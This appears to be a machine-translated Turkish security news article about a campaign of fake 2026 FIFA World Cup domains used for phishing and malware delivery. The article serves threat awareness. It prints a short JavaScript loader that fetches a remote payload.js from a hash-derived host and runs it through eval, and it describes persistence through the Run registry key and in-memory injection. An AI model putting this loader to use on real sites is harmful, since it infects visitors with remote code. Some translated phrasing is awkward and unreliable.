Güvenlik araştırmacıları, son aylarda, yaklaşan 2026 FIFA Dünya Kupası turnuvasına yakından bağlı olan alan adlı kayıtlarında benzeri görülmemiş bir artış gözlemlediler.
Genellikle meşru bilet portalları, mal çıkışları veya canlı akış platformları olarak görünen bu alanlar, kimlik bilgilerini toplamak, kötü amaçlı yazılımları dağıtmak ve sifon finansal verileri dağıtmak için tasarlanmış çok yönlü bir siber kampanyaya öncül olarak hizmet eder.
Saldırganlar etkinliğin yüksek profilli doğasından yararlanıyor, tespit edilmesini önlemek ve şüphesiz hayranlar arasında güvenilirlik sağlamak için on sekiz aya kadar aldatıcı alanlar kaydetiyorlar.
.webp)
Maç programlarına ilgi ve bilet kullanılabilirliği zirveleri olarak, ziyaretçiler bu hileli web siteleriyle etkileşime girerek enfeksiyon zincirini başlatan bu hileli web siteleri ile etkileşime girer.
Beforeai analistleri, Ağustos 2025’te kayıtlarla “FIFA”, “WorldCup” ve ev sahibi şehir isimleri gibi terimler içeren 498’den fazla şüpheli alandan oluşan bir küme belirledi.
.webp)
Bu alanlar, GodAddy.com ve Namecheap dahil olmak üzere en üst kayıt memurlarının yanı sıra .online ve .shop gibi düşük sürtünmeli TLD’lere dağıtılır.
Birçok durumda, tehdit aktörleri daha önce diğer spor etkinliklerine kayıtlı olan yaşlı alanları yeniden kullanır, bu da atıf ve yayından kaldırma çabalarını daha da karmaşıklaştırır.
2030 ve 2034 yıllarında gelecekteki turnuvalara demirlenen alanların kaydı, bu siber suçlu gruplar tarafından kullanılan uzun vadeli stratejiyi vurgulamaktadır.
Bu hazırlık faaliyetinin etkisi basit kimlik avı girişimlerinin ötesine uzanmaktadır. Bu sitelerde kişisel detaylar giren kurbanlar, imza tabanlı algılamadan kaçınabilen Truva Damlaları barındıran yük dağıtım sunucularına yönlendirilebilir.
.webp)
İlk keşif, kötü amaçlı yazılımın, statik analizi engelleyerek her yürütme üzerindeki şifre çözme rutinlerini değiştirmek için polimorfik yükleyicileri kullandığını gösterir.
Komut ve kontrol (C2) iletişimi, HTTPS üzerinden meşru trafikle karışmak için gerçekleşirken, geri dönüş DNS tünelleri, birincil kanallar bozulsa bile veri açığa çıkmasına izin verir.
Enfeksiyon mekanizması ve kalıcılık taktikleri
Enfeksiyon mekanizmasının derinliklerine inmek, tehlikeye atılan açılış sayfalarına enjekte edilen kötü niyetli bir JavaScript ile başlayan aşamalı bir işlemi ortaya çıkarır.
Şüphesiz kullanıcılar URL’leri ziyaret ettiğinde watchfootball-live.comkomut dosyası tarayıcı ortamını kontrol eder ve yalnızca modası geçmiş tarayıcı eklentilerini çalıştırmak gibi belirli koşullar karşılandığında ikinci aşamalı bir yük sağlar. Bu seçici teslimat, sanal alan analizine maruz kalmayı azaltır.
Aşağıdaki snippet, komut dosyasının yük URL’sini almak için zamana dayalı bir karma nasıl hesapladığını gösterir:-
(function() {
const key = "WorldCup2026";
const now = Math.floor(Date.now() / 3600000);
const hash = btoa(unescape(encodeURIComponent(key + now))).substr(0, 16);
fetch(`https://${hash}.cdn-delivery.net/payload.js`)
.then(response => response. Text())
.then(eval);
})();Yürütüldükten sonra, yük, Windows kayıt defterine küçük bir yükleyici yazar HKCU\Software\Microsoft\Windows\CurrentVersion\Run kalıcılık elde etmek için.
Daha sonra, bellekte paketlenmemiş ve gibi meşru süreçlere enjekte edilen şifrelenmiş yürütülebilirler olan zararsız görüntü dosyaları olarak gizlenmiş ek modülleri indirir. svchost.exe.
Yansıtıcı DLL enjeksiyonu kullanarak, kötü amaçlı yazılım bileşenleri diske bırakarak adli ayak izlerini önemli ölçüde azaltır.
Yaşlı alanların sofistike kullanımı, polimorfik ve bellek içi tekniklerle birleştiğinde, dünya 2026 FIFA Dünya Kupası için hazırlanırken gelişen tehdit manzarasının altını çiziyor.
Bu yaklaşan siber saldırıdan hayranları ve kuruluşları korumak için sürekli izleme ve proaktif alan kara listesi çok önemli olacaktır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.